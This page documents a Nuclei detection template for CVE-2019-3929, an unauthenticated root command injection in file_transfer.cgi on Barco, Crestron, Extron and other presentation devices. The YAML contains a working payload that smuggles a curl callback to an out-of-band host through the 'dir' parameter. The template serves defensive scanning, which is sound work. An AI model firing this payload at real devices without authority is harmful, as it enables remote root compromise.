Barco/AWIND OEM Presentation Platform - Remote Command Injection
ID: CVE-2019-3929
Severity: critical
Author: _0xf4n9x_
Tags: cve,cve2019,tenable,oast,injection,kev,edb,rce,packetstorm,crestron
Description
Section titled “Description”The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.
YAML Source
Section titled “YAML Source”id: CVE-2019-3929
info: name: Barco/AWIND OEM Presentation Platform - Remote Command Injection author: _0xf4n9x_ severity: critical description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root. impact: | Successful exploitation of this vulnerability could lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the affected system. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html - https://www.exploit-db.com/exploits/46786/ - https://nvd.nist.gov/vuln/detail/CVE-2019-3929 - https://www.tenable.com/security/research/tra-2019-20 - http://packetstormsecurity.com/files/155948/Barco-WePresent-file_transfer.cgi-Command-Injection.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-3929 cwe-id: CWE-78,CWE-79 epss-score: 0.97363 epss-percentile: 0.99899 cpe: cpe:2.3:o:crestron:am-100_firmware:1.6.0.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: crestron product: am-100_firmware tags: cve,cve2019,tenable,oast,injection,kev,edb,rce,packetstorm,crestron
http: - method: POST path: - "{{BaseURL}}/cgi-bin/file_transfer.cgi"
body: "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2b{{interactsh-url}}Pa_Note%27"
headers: Content-Type: application/x-www-form-urlencoded
matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http"# digest: 4a0a00473045022017856f3a99706830874cc46879695bdbbd54a8908b50a81c35c92feba1a589c1022100d5e4cb015d22b0e0467a1a86894c2ebc04c0196cc9ca24ef2dcfd0b3589044ac:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-3929.yaml"